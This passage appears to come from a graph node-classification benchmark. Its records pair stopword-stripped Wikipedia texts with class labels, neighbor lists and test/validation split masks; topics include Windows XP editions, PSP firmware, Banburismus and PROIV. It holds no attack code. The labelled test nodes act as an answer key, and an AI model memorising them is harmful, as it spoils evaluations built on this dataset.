stcw convention deck officers hold individual certification gmdss system electro-technical officers eto also serve aboard ships trained fix maintain complex systems number notable merchant navy personnel include members uk merchant navy awarded victoria cross george cross george medal distinguished service order distinguished service cross actions serving merchant navy canadian philip bent ex-british merchant navy joined british army outbreak world war victoria cross members merchant navy served either world war also received relevant campaign medals second world war many merchant navy members received king commendation brave conduct lloyd london awarded lloyd war medal bravery sea 541 merchant navy personnel bravery 1939–45 many royal humane society medals awards conferred merchant navy seafarers acts humanity war peacetime september 2016 uk government introduced merchant navy medal meritorious service medal awarded serving served merchant navy fishing fleets uk isle man channel islands exemplary service devotion duty rewarding set outstanding example others first state award meritorious service history merchant navy recipients must nominated someone least two written letters support normally required completed 20 years service merchant navy although exceptional circumstances may less british merchant navy consists various private shipping companies decades many companies come gone merged changed name changed owners british shipping represented nationally globally uk chamber shipping headquartered london list british shipping companies past present",
    "neighbors": [
      3090
    ],
    "mask": "Test"
  },
  {
    "node_id": 8312,
    "label": 9,
    "text": "PROIV:proiv proiv /proʊ fʊər/ low code development platform developed sold northgatearinso part northgate information solutions group active community around 2500 developers end-users worldwide ranging consultants large multinationals finance institutions tax authorities retailers engineering companies media operators software houses proiv usual application domain database-centric business applications proiv similarities languages abap focus rpg proiv programs consist declarative/non-procedural specifications control overall structure program database access implicit sequence execution proiv programmers refer timing cycle procedural subroutines added programmer written 3gl-like language proiv calls logic note proiv programs referred functions confusing differs usual use term programming languages proiv developed sushil k. garg working hawaii 1976 general automation system early 1980s licensed mcdonnell information systems mdis mdis converted proiv run pick-based systems spin known application language liberator proiv ported several different platforms separate teams garg brought ports together one company named pro computer sciences pcs headquartered laguna hills california pcs subsequently acquired mdis 1988 second half 1980s proiv team entered 4gl grand prix contests 1987 1988 1990 product finished second occasion 2000 mcdonnell information systems changed name northgate information solutions proiv supports wide variety operating systems virtue write run anywhere virtual machine model similar java proiv version 8.0 server supported platforms proiv version 8.0 supported client/browser platforms key blank supported server-side proiv applications highly portable small degree care part programmer server platform technology supported current releases includes linux microsoft windows solaris aix hp-ux openvms plus oracle db2 sql server postgresql pervasive sql rms vsam c-isam proiv also runs ibm iseries ibm mainframes programmers familiar proiv consistent nature proiv 4gl productivity proiv intended application domains typically high programmers effective even without extensive technical skills/knowledge applications implemented proiv typically runtime-efficient perform well scalability also typically good little care part programmer key feature proiv independence technologies platforms long-term users passed two three decades technological change using core functionality developed proiv fresh release proiv users immediate access latest technologies without losing development work invested existing proiv applications applications designed one platform easily switched another minimal modification proiv little object-orientation makes limited amount procedural abstraction available programmer proiv little support analytical/statistical/mathematical functions example include basic trigonometric functions proiv-supplied gui client renders rich-client ui applications written proiv based around activex technology works windows client platforms consequently programmers development environments supplied more-recent proiv releases also work windows client platform proiv inbuilt support interprocess communication ipc mechanisms although added via ability extend proiv kernel c. proiv bus task technology allowing service calls proiv application systems proprietary rather based existing standard rpc similar mechanism formal/rigorous definition syntax semantics proiv available programmers make problem resolution difficult inexperienced",
    "neighbors": [
      9441,
      4042,
      10026,
      6797,
      5678,
      5872,
      8539,
      11187,
      3414,
      823,
      1304,
      4410,
      3323,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8313,
    "label": 4,
    "text": "Zimperium:zimperium zimperium inc. privately owned mobile security company based united states offices dallas texas san francisco california company known developing several mobile threat defense software solutions zimperium ltd. founded 2010 chairman cto itzhak avraham 2011 elia yehuda joined co-founder 2013 assets zimperium ltd. acquired zimperium inc. new company incorporated delaware 2014 zimperium inc. released zips android app intrusion prevention system smartphone software uses machine learning monitor user habits detect prevent possible phone hacking 2015 zimperium inc. researched developed security systems group software bugs affect series android operating systems called stagefright bug 2016 company partnered blackberry partnership consisted integration zips zimperium enhancing mobile security ios android platforms zimperium inc. raised 60m private investors including samsung telstra sierra ventures softbank warburg pincus company partnered several technology companies including softbank group deutsche telekom telstra smartone oracle microsoft mobileiron january 2018 zimperium inc assigned intellectual property including granted patents trademarks ally bank security collateral zimperium inc global company hundreds customers customers include enterprises sizes large federal local government agencies leading mobile operators major oem partners",
    "neighbors": [
      9488,
      7730,
      9356,
      4957
    ],
    "mask": "None"
  },
  {
    "node_id": 8314,
    "label": 7,
    "text": "Sinch_(company):sinch company sinch telecommunications cloud communications platform service paas company headquartered stockholm sweden sinch also offices 30 cities worldwide including atlanta london madrid san francisco singapore sydney sinch initially founded may 2014 andreas bernström stockholm san francisco originally technology behind rebtel sinch spun-out 12 million funding focusing mobile first app developer market sinch launched voice instant messaging products may 2014 quickly launched sms api product end 2014 2016 clx communications acquired sinch total consideration sek 138.9 million debt-free basis founded 2008 clx acquired numerous companies industry 2009 2018 february 2019 announced clx launched new corporate brand visual identity unify business units name acquiring sinch 2016 leveraged brand name encompass entire company accurately immediately depict current offerings mission sinch effectively inherited history clx communications considered different brand one launched 2014 clx completed initial public offering ipo listed nasdaq stockholm october 2015 since february 2019 company found mid cap list technology sector ticker 'sinch sinch platform based voice ip webrtc pstn sms verification instant messaging technologies power products provides sdk developers add app get access sinch product range available ios android javascript since sinch brand name leveraged clx communications product portfolio grown encompass services rich communications services rcs thanks strategic partnership clx google 2017 well operator portfolio inherited symsoft company acquired clx 2009 sinch listed lead411 2014 hottest san francisco companies ceo founder andreas announced one 9 innovative people voip 2014",
    "neighbors": [
      8934
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8315,
    "label": 2,
    "text": "Windows_XP_editions:windows xp editions windows xp released several editions since original release 2001 windows xp available many languages addition add-ons translating user interface also available certain languages first two editions released microsoft windows xp home edition designed home users windows xp professional designed business power users windows xp professional offers number features unavailable home edition including march 2004 european commission fined microsoft €497 million £395 million 784 million ordered company provide version windows without windows media player commission concluded microsoft broke european union competition law leveraging near monopoly market pc operating systems onto markets work group server operating systems media players unsuccessful appeals 2004 2005 microsoft reached agreement commission would release court-compliant version windows xp edition n. version include company windows media player instead encourages users pick download media player microsoft wanted call version reduced media edition eu regulators objected suggested edition n name n signifying media player home professional editions windows xp sold price version windows media player included dell hewlett-packard lenovo fujitsu siemens chosen stock product however dell offer operating system short time consumer interest low roughly 1,500 units shipped oems reported sales consumers n editions windows xp also include windows movie maker microsoft made available separate download december 2005 korean fair trade commission ordered microsoft make available editions windows xp windows server 2003 contain windows media player windows messenger like european commission decision decision based grounds microsoft abused dominant position market push products onto consumers unlike decision however microsoft also forced withdraw non-compliant versions windows south korean market k kn editions windows xp home edition professional edition released august 2006 available english korean editions contain links third-party instant messenger media player software edition windows xp home intended sale certain low-cost netbooks appear labeled windows xp home edition ulcpc ulcpc standing ultra-low-cost personal computer version comes preinstalled oem solutions providing desktops blade pc hardware addition copy windows xp professional includes remote desktop license windows xp starter edition lower-cost version windows xp available thailand vietnam turkey indonesia india philippines russia colombia brazil argentina peru bolivia chile mexico ecuador uruguay malaysia venezuela similar windows xp home limited low-end hardware run 3 programs time features either removed disabled default according microsoft press release windows xp starter edition low-cost introduction microsoft windows xp operating system designed first-time desktop pc users developing countries starter edition includes special features certain markets consumers may computer literate found home edition include localised help features may speak english country-specific computer wallpaper screensavers default settings designed easier use typical windows xp installations malaysian version example contains desktop background kuala lumpur skyline addition starter edition also unique limitations prevent displacing expensive versions windows xp three applications run starter edition application may open maximum three windows maximum screen resolution 1024×768 support workgroup networking domains addition starter edition licensed low-end processors like intel celeron amd duron sempron also 512 mb limit main memory 120 gb disk size limit microsoft made clear however total disk space per partition per disk also fewer options customizing themes desktop taskbar october 9 2006 microsoft announced reached milestone 1 million units windows xp starter edition sold mass market however starter edition much success many markets available pirated versions higher end versions windows popular legal counterparts markets non-genuine copies xp professional obtained mall stores typically charge amount cds/dvds taken files original retail value unlicensed copies windows xp professional typically cost 0.70 since uses 1 cd compared around 30 properly licensed copy xp starter edition code-named freestyle development first released september 2002 initial release available solely conjunction computers included media center capabilities could purchased separately first major update released 2004 distributed tier 1 oems previously sold windows xp media center edition pc updated 2005 first edition available system builders many features windows xp media center edition 2005 including screen dancers auto playlist dj high end visual screen savers taken windows xp plus packages originally shipped add-ons windows xp enhance users experience windows xp machine preview version windows xp media center edition microsoft ehome division shown ces 2002 final version released july 2002 2005 release microsoft focused efforts building new media center features home premium ultimate editions windows vista windows 7 windows media center built-in unlike releases windows xp media center edition available retail purchase without necessary hardware notable feature unique edition windows media center provides large-font remotely accessible interface 10-foot user interface television viewing computer well recording playback tv guide dvd playback video playback photo viewing music playback unlike competing commercial digital video recorder products microsoft charge monthly subscription fee media center tv guide service due strict hardware requirements microsoft sell media center edition retail markets alongside home professional editions microsoft distributes msdn subscribers oem system builders certain countries consumers generally purchase media center pre-installed new computer reseller sells oem versions microsoft software media center edition consumer-oriented edition windows xp updated new features annual basis five-year development windows vista mce 2005 release example includes update windows movie maker supports burning dvds new visual style called royale support media center extenders soundspectrum g-force sound visualizations microsoft also released remote control receiver infrared blaster mce 2005 new specially designed wireless computer keyboard mce 2005 released september 2005 using media center extenders xbox 360 media center edition also able connect stream recorded tv music pictures network connection media center edition retains features included windows xp professional simply add-on professional installed provided valid mce product key setup professional features left including remote desktop encrypting file system however ability join active directory domain removed marketed home product need domain support one value registry needed circumvent restriction installation mce 2005 in-place upgrade previous version already joined domain ability retained unless user uses windows media center extender case ability lost restored presumably microsoft introduced limit media center extender devices introduced version rely fast user switching component component must disabled order join domain media center higher hardware requirements editions windows xp mce 2005 requires least 1.6 ghz processor directx 9.0 hardware-accelerated gpu ati radeon 9 series nvidia geforce fx series higher 256 mb system ram functionality media center extender support use multiple tuners hdtv playback/recording carries higher system requirements media center much restricted range hardware supports software dvr solutions media center tuners must standardized driver interface originally required hardware mpeg-2 encoder closed caption support number features media center remote controls standardized terms button labels functionality degree general layout edition intended specially designed notebook/laptop computers called tablet pcs windows xp tablet pc edition compatible pen-sensitive screen supporting handwritten notes portrait-oriented screens except msdn volume license subscribers windows xp tablet edition could purchased separately tablet pc edition superset windows xp professional difference tablet functionality including alternate text input tablet pc input panel basic drivers support tablet pc specific hardware requirements install tablet pc edition include tablet digitizer touchscreen device hardware control buttons including ctrl-alt-delete shortcut button scrolling buttons least one user-configurable application button two releases service pack 2 windows xp includes tablet pc edition 2005 free upgrade version brought improved handwriting recognition improved input panel allowing used almost every application input panel also revised extend speech recognition services input correction applications windows xp tablet pc edition based windows xp professional includes software features provided addition includes following components following downloadable packs released microsoft add functionality windows xp tablet pc edition utilizes ink object means data input storage data type created part windows xp tablet pc edition api allows users manipulate process handwritten data including recognition results cases pressure information part stroke properties ink changed much way properties objects data saved allow future reference many applications referencing ink object also allow handwritten notes filtered searched based recognition results stored ink saved integrated operating system tablet pc input panel tip allows handwriting converted text use non-full-screen applications integrated handwriting recognition windows xp tablet pc edition 2005 recognize print cursive mixed writing accuracy increased configuring recognizer expect left-handed writing right-handed writing recognition variety languages available install recognizer pack handwriting engine trained recognize particular handwriting style user must modify handwriting better recognized system order use feature effectively speech recognition functionality also incorporated tablet input panel compared previous versions substantially improved speech recognition engine version 6 also ships office 2003 tutorial microphone wizard training modules included possible dictate text using speech certain supported applications control windows gui applications using speech although accuracy improvements made windows vista surpass features update windows xp tablet pc edition containing ink analysis stylusinput api support introduced windows vista also available 2006 microsoft made available two additional editions windows xp home edition hardware manufacturers wanted provide subscription-based pay go-based models selling computers editions named windows xp home edition subscription computers windows xp home edition prepaid computers respectively part microsoft flexgo initiative described company-issued press release making pcs accessible dramatically reducing entry cost enabling customers pay computer use purchase prepaid cards market trials starting first emerging markets inadequate access consumer credit unpredictable income high entry costs prevent many consumers purchasing computer editions targeted towards emerging markets india brazil hungary vietnam editions contain additional components enforce subscription models via metering metering typically enforced hardware component prevent tampering installation windows operates normal mode limited access mode hardware locked mode depending state subscription computer positive time balance operates normal mode functions regular windows xp home edition machine time balance expires machine operate limited access mode amount time set hardware manufacturer five hours default entering hardware locked mode limited access mode screen uses high-contrast low-resolution display settings hardware locked mode operating system disabled entirely message displayed boot-up instructions re-enable machine two distinct editions windows xp released support 64-bit hardware windows xp 64-bit edition designed run intel itanium family microprocessors native ia-64 mode two versions windows xp 64-bit edition released edition discontinued january 2005 hewlett-packard last distributor itanium-based workstations stopped selling itanium systems marketed 'workstations july 2005 windows xp 64-bit edition longer supported security updates made available windows xp 64-bit edition marketed itanium version microsoft windows xp editions instead separate edition made solely itanium processor 64-bit instructions mostly analogous windows xp professional numerous older technologies dao jet database ntvdm windows windows longer present support ms-dos win16 applications absent original version also lacks media applications windows media player netmeeting windows movie maker integrated cd burning although wmp netmeeting added 2003 version similar ability previous alternate architecture ports windows windows nt 4.0 powerpc mips r4x00 alpha run 16-bit x86 code via windows windows windows xp 64-bit edition run standard x86 32-bit applications wow64 windows-on-windows 64-bit emulation layer original itanium processor contains on-chip ia-32 decoder deemed far slow serious use running 400 mhz microsoft intel wrote software 32 64-bit translator dubbed ia-32 execution layer allows real time translation x86 32-bit instructions ia-64 instructions allowing 32-bit applications run albeit significantly slowly native code edition supports x86-64 extension intel ia-32 architecture x86-64 implemented amd amd64 found amd opteron athlon 64 chips selected sempron processors implemented intel intel 64 formerly known ia-32e em64t found intel pentium 4 intel later chips released april 25 2005 windows xp professional x64 edition uses version 5.2.3790.1830 core operating system binaries version used windows server 2003 sp1 latest versions operating system development even service packs updates windows xp x64 windows server 2003 x64 distributed unified packages much manner windows 2000 professional server editions x86 initial development phases 2003–2004 windows xp professional x64 edition named windows xp 64-bit edition x86 extended systems later windows xp 64-bit edition extended systems opposed 64-bit edition itanium systems rtm version windows xp professional x64 edition based windows server 2003 service pack 1 codebase reason service pack 2 windows xp x64 edition released march 13 2007 service pack 2 32-bit versions windows xp fact due earlier release date 32-bit version many key features introduced service pack 2 32-bit x86 editions windows xp already present rtm version 64-bit x86-64 counterpart service pack 2 first last released service pack windows xp professional x64 edition windows xp professional x64 edition uses technology named windows-on-windows 64-bit wow64 permits execution 32-bit x86 applications first employed windows xp 64-bit edition itanium reused x64 editions windows xp windows server 2003 since x86-64 architecture includes hardware-level support 32-bit instructions wow64 switches processor 32- 64-bit modes according microsoft 32-bit software running wow64 similar performance executing 32-bit windows fewer threads possible overheads 32-bit processes shown *32 task manager 64-bit processes extra text present although 32-bit applications run transparently mixing two types code within process allowed 64-bit application link 32-bit library dll similarly 32-bit application link 64-bit library may lead need library developers provide 32- 64-bit binary versions libraries windows xp x64 edition includes 32- 64-bit versions internet explorer 6 order allow possibility third-party browser plugins activex controls may yet available 64-bit versions older 32-bit drivers services supported 64-bit windows video audio codecs xvid oggds 32-bit dlls supported long media player uses 32-bit well 64-bit windows include ntvdm windows windows native support execution ms-dos 16-bit windows applications written windows 3.1 primary benefit moving 64-bit increase maximum allocatable virtual memory single standard process 32-bit windows operating system limited total 2,093,056 kilobytes 2gb minus one 4kb page large address aware 32-bit processes allocate 4gb windows xp x64 support much memory although theoretical memory limit 64-bit computer address 16exabytes windows xp x64 limited 128gb physical memory 8 terabytes virtual memory per process practical limit usually size pagefile windows xp professional x64 edition windows xp 64-bit edition version 2003 releases windows xp include internet information services 6.0 matches version shipped windows server 2003 versions xp include 5.1 64-bit versions windows xp also immune certain types viruses malware target 32-bit systems since system files 64-bit extra registers x86-64 architecture result performance improvements certain kinds applications often result slight decrease performance compared application implemented 32 bit x86 code running windows xp 32 bit editions microsoft released number editions windows xp targeted towards developers embedded devices use specific consumer electronics set-top boxes kiosks/atms medical devices arcade video games point-of-sale terminals voice internet protocol voip components editions belong windows embedded subfamilies windows xp embedded systems binary identical windows xp professional licensed embedded devices windows xp embedded commonly abbreviated xpe componentized version professional edition windows xp original equipment manufacturer free choose components needed thereby reducing operating system footprint also reducing attack area compared xp professional unlike windows ce microsoft operating system portable devices consumer electronics xp embedded provides full windows api support full range applications device drivers written microsoft windows system requirements state xpe run devices least 32 mb compact flash 32 mb ram p-200 microprocessor xpe released november 28 2001 october 2008 newest release windows xp embedded service pack 3 devices targeted xpe included automatic teller machines arcade games slot machines cash registers industrial robotics thin clients set-top boxes network attached storage nas time clocks navigation devices railroad locomotives etc custom versions os deployed onto anything full-fledged pc even though xpe supports hardware xp professional supports x86 architecture licensing restrictions prevent deployed standard pcs however microsoft made exceptions rule allowing xpe alongside standard oem install windows dell notebooks contain embedded xp installation part mediadirect 2.0 feature also found acer ones well samsung q1 windows embedded standard 2009 succeeded xpe 2h 2008 windows embedded standard 2009 derived windows xp embedded since microsoft time development componentized version windows vista windows embedded standard 2009 includes silverlight .net framework 3.5 internet explorer 7 windows media player 11 rdp 6.1 network access protection microsoft baseline security analyzer support managed windows server update services system center configuration manager windows embedded standard 7 succeeded windows embedded standard 2009 april 2010 componentized version windows 7 windows embedded point service wepos specialization windows xp embedded released may 25 2005 focuses point sale device market fuel pumps self checkout stations automated teller machines cash registers available purchase directly microsoft instead licensed original equipment manufacturers windows embedded posready 2009 succeeded wepos january 2009 windows embedded posready 2009 derived wepos since microsoft time development componentized version windows vista windows embedded posready 7 succeeded windows embedded posready 2009 july 2011 based windows 7 sp1 july 2006 microsoft introduced thin-client variant windows xp embedded called windows fundamentals legacy pcs targets older machines early original pentium available software assurance customers intended would like upgrade windows xp take advantage security management capabilities afford purchase new hardware windows thin pc succeeded windows fundamentals legacy pcs june 2011 based windows embedded standard 7 sp1",
    "neighbors": [
      6150,
      11271,
      3089,
      11283,
      11301,
      5673,
      3626,
      6697,
      1581,
      7727,
      9784,
      1083,
      10812,
      7234,
      582,
      3142,
      1098,
      7755,
      7253,
      8281,
      3162,
      8798,
      607,
      2658,
      10338,
      8296,
      5225,
      6763,
      8299,
      7796,
      6265,
      5754,
      636,
      8316,
      8829,
      639,
      11391,
      641,
      6276,
      651,
      6797,
      10896,
      7313,
      2196,
      10393,
      6301,
      673,
      4771,
      7857,
      3250,
      9910,
      5824,
      200,
      10957,
      2259,
      3283,
      3289,
      4316,
      9442,
      9448,
      5356,
      10989,
      1776,
      2804,
      5369,
      5380,
      5384,
      8976,
      3857,
      11539,
      5401,
      5406,
      4383,
      6431,
      6441,
      10026,
      3890,
      7991,
      6462,
      321,
      7492,
      11079,
      2383,
      11605,
      2391,
      4439,
      7515,
      11103,
      10080,
      2919,
      6508,
      2925,
      1400,
      2943,
      8576,
      10623,
      3463,
      6028,
      8080,
      5523,
      4505,
      929,
      10658,
      4515,
      3496,
      1978,
      7615,
      7106,
      6088,
      9166,
      2001,
      9173,
      7134,
      5600,
      10215,
      3561,
      4074,
      495,
      5103,
      6641,
      499,
      1524,
      3573,
      10747,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 8316,
    "label": 2,
    "text": "PlayStation_Portable_system_software:playstation portable system software playstation portable system software official firmware playstation portable uses xrossmediabar xmb user interface similar playstation 3 console updates add new functionality well security patches prevent homebrew applications plugins executed system updates obtained four ways system software updates used consoles region sony recommends downloading system software updates released region corresponding system place purchase system software updates added various features including web browser adobe flash player 6 support additional codecs images audio video playstation 3 connectivity well patches several security exploits vulnerabilities execution homebrew programs battery must least 50 charged else system prevent update installing power supply lost writing system software console longer able operate unless system booted service mode sent sony repair still warranty current version software 6.61 made available january 15 2015 minor update released three years release previous version 6.60 2011 playstation portable uses xrossmediabar xmb graphical user interface also used playstation 3 ps3 console variety sony bravia hdtvs blu-ray disc players many sony products xmb displays icons horizontally across screen seen categories users navigate using left right buttons d-pad move icons forward back across screen highlighting one time opposed using kind pointer select option one category selected usually specific options available select spread vertically selected icon users may navigate among options using buttons d-pad basic features offered xmb implementations varies based device software version psp console xmb top level icons photos music videos games networking allows use web browser settings extras also xmb offers degree multitasking psp using home button playing music would allow users browse photos without stopping music xmb proved successful user interface sony products psp ps3 next generation sony video game consoles playstation 4 playstation vita longer use user interface example xmb replaced livearea interface ps vita playstation portable comes web browser browsing internet web browser version netfront browser made access co. ltd. released free 2.00 system software update browser supports common web technologies http cookies forms css well basic javascript capabilities version 2.50 upgrade added unicode utf-8 character encoding auto-select options browser encoding menu also introduced saving input history online forms version 2.70 psp system software introduced basic flash capabilities browser however player runs flash version 6 five iterations behind current desktop version 11 making websites difficult view three different rendering modes normal just-fit smart-fit normal display page changes just-fit attempt shrink elements make whole page fit screen preserve layout smart-fit display content order appears html size adjustments instead drop element preceding element starts go screen browser also limited tabbed browsing maximum three tabs website tries open link new window browser opens new tab parents limit content enabling browser start control blocks access web browser creating 4-digit pin settings security additionally browser configured run proxy server protected security pin enable use web filtering monitoring software network recently trendmicro psp added feature enabled via subscription filter monitor content psp psp browser slower compared modern browsers often runs memory due limitations put place sony alternatively homebrew allowed custom version browser released utilizes 32/64 mb psp ram allows browser load pages faster memory larger pages opera mini also used psp pspkvm homebrew application sun java virtual machine claimed provide much faster loading times default browser provides better web page compatibility like many video game consoles playstation portable capable photo audio video playback variety formats however unlike sony home consoles playstation 3 playstation 4 possible play blu-ray dvd movies playstation portable directly since lacks standard blu-ray dvd drive umd drive exist umd movies umd format never saw implementation device playstation portable result market limited compared optical media formats movies released umd since 2011 final harry potter movie one final releases format playstation portable also supports feature known remote play allows psp access many features playstation 3 console remote location using ps3 wlan capabilities home network internet however unlike later remote play feature playstation vita playstation 4 remote play capabilities psp ps3 much limited although ps3 capabilities related main user interface accessible remote play playback dvds blu-ray discs playstation 2 games playstation 3 games copy-protected files stored ps3 hard drive supported actual remote play psp ps3 games supported select ps3 titles furthermore psp-2000 psp-3000 psp-n1000 use skype voip service starting system software version 3.90 service allows skype calls made wi-fi psp go bluetooth modem feature possible use voip service original psp-1000 console due hardware limitations also existed services psp room playstation portable similar playstation 3 online community-based service known playstation home homebrew development popular time playstation portable besides official firmware ofw made sony custom firmware also written custom firmware simply cfw also commonly seen playstation portable handheld consoles custom firmware allows running unsigned code homebrew applications umd backups emulators consoles well psone games disc images converted psp format unlike official system software usually allow signed retailed copies software run famous custom firmware include m33 custom firmware dark_alex well made others custom firmware 5.50gen series minimum edition me/lme cfw pro cfw since early days hackers working psp discovered exploits system software 1.00 1.50 allowed run unsigned code psp many psp-1000 users downgraded consoles versions order install custom firmware corresponding higher version system software later exploits discovered recent versions system software allowing installation homebrew content sony put significant effort blocking custom firmware third party devices content psp consoles effort quite successful psp july 2007 dark_alex officially stopped work psp citing perceived problems sony one reasons departure custom firmware continue developed updated however would different successor playstation vita unlike psp currently native cfw ps vita besides popular henakau exploit allowed users run unsigned code n't technically custom firmware exists ecfw ps vita meaning custom firmware psp running psp emulator ps vita features ecfw expected much limited real cfw ps vita unless usage adrenaline homebrew upgrade existing emulator adds usb support fixed ps1 emulation blue colour filter gaming platforms sony gaming platforms next generation gaming platforms generation",
    "neighbors": [
      3077,
      11271,
      10761,
      2061,
      9743,
      3089,
      8725,
      3626,
      1067,
      7727,
      1587,
      1080,
      9784,
      1083,
      1091,
      3651,
      7748,
      6732,
      10316,
      7246,
      6738,
      7253,
      3162,
      9306,
      607,
      2658,
      4194,
      9320,
      6763,
      5746,
      4725,
      7801,
      633,
      8315,
      1148,
      6781,
      8829,
      11391,
      643,
      6276,
      11398,
      4745,
      6799,
      10393,
      6301,
      673,
      6311,
      684,
      3248,
      7857,
      11444,
      1718,
      5824,
      10436,
      9927,
      8395,
      4305,
      2259,
      6361,
      6873,
      8923,
      8423,
      8937,
      9452,
      3824,
      5369,
      4364,
      5397,
      7965,
      5406,
      4383,
      1316,
      9508,
      9512,
      4908,
      1839,
      306,
      7991,
      7492,
      9543,
      10056,
      9033,
      11079,
      850,
      6486,
      859,
      10080,
      359,
      10599,
      873,
      6508,
      2925,
      7028,
      7552,
      5506,
      9091,
      3462,
      1927,
      5534,
      9151,
      9153,
      2001,
      3542,
      10202,
      4060,
      3551,
      10215,
      3561,
      495,
      1524
    ],
    "mask": "None"
  },
  {
    "node_id": 8317,
    "label": 8,
    "text": "Secure-adaptive_architecture:secure-adaptive architecture pertaining web services secure-adaptive architecture saa refers particular approach towards security management issues inherent data transfer computer networks relating certain services micropayments saa personal information end-user name banking information personal identity numbers social security numbers retained two main benefits end-user chance identity theft fraud considerably reduced service provider means direct communication end-user financial institution unnecessary saa uses best class proven security techniques ensure safe transfer data network resources include protocols ssl communications client-side authentication aes encryption saa requires consistent pervasive real-time monitoring network resources ensure security",
    "neighbors": [
      5433,
      10020
    ],
    "mask": "Test"
  },
  {
    "node_id": 8318,
    "label": 4,
    "text": "Banburismus:banburismus banburismus cryptanalytic process developed alan turing bletchley park britain second world war used bletchley park hut 8 help break german kriegsmarine naval messages enciphered enigma machines process used sequential conditional probability infer information likely settings enigma machine gave rise turing invention ban measure weight evidence favour hypothesis concept later applied turingery methods used breaking lorenz cipher aim banburismus reduce time required electromechanical bombe machines identifying likely right-hand middle wheels enigma hut 8 performed procedure continuously two years stopping 1943 sufficient bombe time became readily available banburismus development clock method invented polish cryptanalyst jerzy różycki hugh alexander regarded best banburists i. j good considered process intellectual game job easy enough trivial difficult enough cause nervous breakdown first months arriving bletchley park september 1939 alan turing correctly deduced message-settings kriegsmarine enigma signals enciphered common grundstellung starting position rotors super-enciphered bigram trigram lookup table trigram tables book called kenngruppenbuch k book however without bigram tables hut 8 unable start attacking traffic breakthrough achieved narvik pinch disguised armed trawler polares way narvik norway seized north sea 26 april 1940 germans time destroy cryptographic documents captured material revealed precise form indicating system supplied plugboard connections grundstellung 23 24 april operators log gave long stretch paired plaintext enciphered message 25th 26th bigram tables part capture hut 8 able use settings-lists read retrospectively kriegsmarine traffic intercepted 22 27 april allowed partial reconstruction bigram tables start first attempt use banburismus attack kriegsmarine traffic 30 april onwards eligible days least 200 messages received partial bigram-tables deciphered indicators first day broken 8 may 1940 thereafter celebrated foss day honour hugh foss cryptanalyst achieved feat task took november year time intelligence date show banburismus could work also allowed much bigram tables reconstructed turn allowed 14 april 26 june broken however kriegsmarine changed bigram tables 1 july end 1940 much theory banburismus scoring system worked first lofoten pinch trawler krebs 3 march 1941 provided complete keys february – bigram tables k book consequent decrypts allowed statistical scoring system refined banburismus could become standard procedure kriegsmarine enigma mid-1943 banburismus utilised weakness indicator procedure encrypted message settings kriegsmarine enigma traffic unlike german army airforce enigma procedures kriegsmarine used grundstellung provided key lists messages particular day pair days meant three-letter indicators enciphered rotor settings depth normally indicators two messages never could happen part-way message rotor positions became starting position rotors another message parts two messages overlapped way depth principle behind banburismus relatively simple seems rather similar index coincidence two sentences english german written one count made often letter one message corresponding letter message matches would occur sentences random strings letters random sequence repeat rate single letters expected 1 26 around 3.8 german navy messages shown 1 17 5.9 two messages depth matches occur plaintexts however messages depth two ciphertexts compare random giving repeat rate 1 26 allows attacker take two messages whose indicators differ third character slide looking giveaway repeat pattern shows align depth comparison two messages look repeats made easier punching messages onto thin cards 250 mm high 10 several metres wide different cards different lengths message hole top column card represented position hole bottom represented z two message-cards laid top light-box light shone repeat made much simpler detect count repeats cards printed banbury oxfordshire became known 'banburies bletchley park hence procedure using banburismus application scritchmus procedure see gives clue possible right-hand rotor message indicator vfg xcybgdslvwbdjlkwipehvygqzwdthrqxikeesqsspzxarixeabqiruckhgwuebpf message indicator vfx ynscfccpvipemsgizwflhesciyspvrxmcfqaxvxdvuqilbjuabnlkmkdjmenunq hut 8 would punch onto banburies count repeats valid offsets −25 letters +25 letters two promising positions offset eight letters shows nine repeats including two bigrams overlap 56 letters 16 promising position looks like offset seven shows single trigram overlap 57 letters turing method accumulating score number decibans allows calculation situations likely represent messages depth might expected former winner odds 5:1 latter 2:1 turing calculated scores number single repeats overlaps many letters number bigrams trigrams tetragrams often represented german word plaintext scores calculated according type message traffic analysis even position within message tabulated relevant values summed banburists assessing pairs messages see likely depth bletchley park used convention indicator plaintext vfx eight characters ahead vfg terms third differing letter x g+8 scritchmus part banburismus procedure could lead identification right-hand fast wheel banburist might evidence various message-pairs third indicator letter differing showing x q−2 h x−4 b g+3 would search deciban sheets distances odds better 1:1 i.e scores ≥ +34 attempt made construct 'end wheel alphabet forming 'chains end-wheel letters repeats could construct chain follows compared progressive offsets known letter-sequence enigma rotor quite possibilities discounted due violating either reciprocal property no-self-ciphering property enigma machine so-called end-wheel alphabet already limited nine possibilities merely establishing letter-chain five letters derived mere four message-pairs hut 8 would try fitting letter-chains — ones letters common first chain — nine candidate end-wheel alphabets eventually hope left one candidate maybe looking like end-wheel alphabet forces conclusion end wheel fact rotor rotor ii would caused mid-wheel turnover stepped e f yet middle span letter-chain f -- -- -- -- -o likewise possible mid-wheel turnovers precluded rotor turnover q r part alphabet spanned chain different enigma wheels different turnover points presumably measure designers machine improve security however complication allowed bletchley park deduce identity end wheel end wheel identified principles extended handle middle rotor though added complexity search overlaps message-pairs sharing first indicator letter overlaps could therefore occur 650 characters apart workload beyond manual labour bp punched messages onto 80-column cards used hollerith machines scan tetragram repeats better told banburies set light boxes overlap evaluate whole repeat pattern armed set probable mid-wheel overlaps hut 8 could compose letter-chains middle wheel much way illustrated end wheel turn scritchmus would give least partial middle wheel alphabet hopefully least possible choices rotor middle wheel could eliminated turnover knowledge done identifying end wheel taken together probable right hand middle wheels would give set bombe runs day would significantly reduced 336 possible",
    "neighbors": [
      9156,
      2341,
      6223,
      1941,
      7416,
      1342
    ],
    "mask": "Test"
  },
  {
    "node_id": 8319,
    "label": 2,
    "text": "Optware:optware optware free software package manager embedded systems originally developed distribution mechanism unslung linux distribution linksys nslu2 optware adopted variety hobbyist communities device developers optware used number platforms including webos community working palm pre pixi wl-500g wl-hdd wl-500gx wl-500gp asus routers plug computers pogoplug v1 v2 pro biz dockstars etc asustor synology nas devices late 2010 first optware android released novaports team nook color optware packages currently run following devices",
    "neighbors": [
      2178,
      6178,
      10760,
      5067,
      2285,
      2258,
      823,
      6618,
      10109
    ],
    "mask": "Test"
  },
  {
    "node_id": 8320,
    "label": 4,
